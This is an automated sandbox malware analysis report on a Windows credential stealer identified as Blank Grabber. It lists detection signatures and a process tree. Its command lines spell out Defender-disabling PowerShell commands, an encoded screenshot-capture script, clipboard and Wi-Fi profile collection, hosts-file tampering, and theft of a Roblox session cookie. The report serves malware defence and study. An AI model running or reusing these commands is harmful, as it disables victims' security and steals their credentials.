Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
program.exe

Overview

General Information

Sample name:program.exe
Analysis ID:1557107
MD5:3e6865657b29faea3a355c710f0aad45
SHA1:ad9b98fa0f96685abc17aaab7fe4d65ac8fe34f7
SHA256:2c48f7bc874f1c812c0031519e756c28f940a58b2f64cdb40a08f1ccc798f671
Tags:exeuser-aachum
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • program.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\program.exe" MD5: 3E6865657B29FAEA3A355C710F0AAD45)
    • program.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\program.exe" MD5: 3E6865657B29FAEA3A355C710F0AAD45)
      • cmd.exe (PID: 7376 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7520 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7512 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7956 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7424 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7552 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7788 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7988 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7808 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7980 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8084 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8136 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1184 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8188 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 3180 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 2520 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5472 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1832 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 6768 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 5720 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8216 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 4076 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 8268 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8260 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8776 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 9144 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES93BE.tmp" "c:\Users\user\AppData\Local\Temp\tgmup5d5\CSC93ACBC84BC674220B3501D9F22ECFDE.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 7300 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8252 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8456 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8588 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8464 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8596 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 8616 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8704 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8644 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8752 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 8768 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8920 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8784 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8956 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8792 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 8964 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 9024 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9080 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9160 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7080 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
